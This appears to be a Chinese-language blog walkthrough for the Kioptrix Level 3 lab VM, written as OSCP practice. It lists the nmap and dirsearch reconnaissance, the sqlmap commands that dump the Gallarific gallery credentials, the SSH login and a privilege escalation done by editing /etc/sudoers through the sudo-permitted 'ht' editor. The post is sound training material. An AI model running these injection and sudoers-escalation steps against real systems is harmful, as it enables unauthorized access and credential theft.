当前位置: 首页 > news >正文

OSCP备战-kioptrixvm3详细解法

news 2025/7/2 10:24:51

探测IP

arp-scan -l


得出目标IP:192.168.155.165
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24


也可以使用

nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

sudo nano /etc/hosts


添加一行如图所示:

192.168.155.165 kioptrix3.com


按下ctrl+x保存退出

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT
Nmap scan report for 192.168.155.165
Host is up (0.0050s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with 

80端口

访问一下


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.165 -e *


访问一下试试:
192.168.155.165/phpmyadmin/index.php 


尝试无密码登录:admin
进入后台


no privileges提示我们没有权限,显示即为一个虚拟数据库
尝试爆破了一下,没出结果
回到主页,能点的都点一下
博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的


点击login又是一个登录框


最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点
如图:


明显跟之前的页面不一样,在那dirsearch扫一下

dirsearch -u http://kioptrix3.com/gallery -e *


访问得到:


Gallarific 2.1 - Free Version released October 10, 2009
搜一下searchsploit Gallarific


有一个注入漏洞的

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch


数据库:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs


现在连接的数据库:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db


DBMS用户:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user


发现是root用户
表:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables


字段:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns


值:

sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump


得到登录结果:
admin/n0t7t1k4
如此尝试,发现在dev_accounts中,得到了两组用户名和密码


尝试进行连接,只有后两组密码可以连接

ssh -oHostKeyAlgorithms=+ssh-rs- loneferret@192.168.155.165 


查看查看:

cat /etc/passwd


列出当前用户家目录下的所有文件和文件夹:

ls -al


读取文件:

cat CompanyPolicy.README


查看权限:

sudo -l


根据提示执行:

sudo /usr/local/bin/ht


报错
执行命令:

echo $TERM
export TERM=xterm
echo $TERM


重新执行

sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers


回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。
修改配置添加一行

loneferret ALL=(ALL) ALL


F2保存,ctral+c退出
执行命令

sudo /bin/bash

成功

http://www.dtcms.com/a/184471.html

相关文章:

  • CMOS内存的地址空间在主内存空间中吗?
  • sunset:Solstice靶场
  • C++学习之STL学习
  • PowerShell 脚本中文乱码处理
  • 力扣热题100之合并两个有序链表
  • 软件架构师知识点总结
  • Java常用类-比较器
  • 华为云Flexus+DeepSeek征文|DeepSeek-V3/R1商用服务开通教程以及模型体验
  • [Java实战]Spring Boot 静态资源配置(十三)
  • ARM GIC(七)亲和路由:GICD_IROUTER寄存器具体如何与MPIDR配合使用?
  • 2050年的世界是怎样的?
  • tensorflow 1.x
  • AI智慧公园管理方案:用科技重塑市民的“夜游体验”
  • kubectl系列(十二):查询pod的resource 配置
  • C++编程中,什么是野指针?
  • Linux系统编程之消息队列
  • 关于TIAV20 PLCSIM仿真错误的原因
  • ST表(稀疏表)
  • Unity基础学习(十一)核心系统---光源系统基础
  • 机器人运动控制原理浅析-UC Berkeley超视觉模态模型
  • 【Python 算法零基础 2.模拟 ⑤ 基于栈和队列】
  • 【递归、搜索与回溯算法】导论
  • java加强 -List集合
  • 应急响应基础模拟靶机-security2
  • 御网杯2025 Web,Msic,密码 WP
  • 深入解析多选字段的存储与查询:从位运算到数据库设计的最佳实践
  • uni-app学习笔记(二)--vue页面代码的构成和新建页面
  • html body 设置heigth 100%,body内元素设置margin-top出滚动条(margin 重叠问题)
  • [学习]RTKLib详解:convkml.c、convrnx.c与geoid.c
  • 二、transformers基础组件之Tokenizer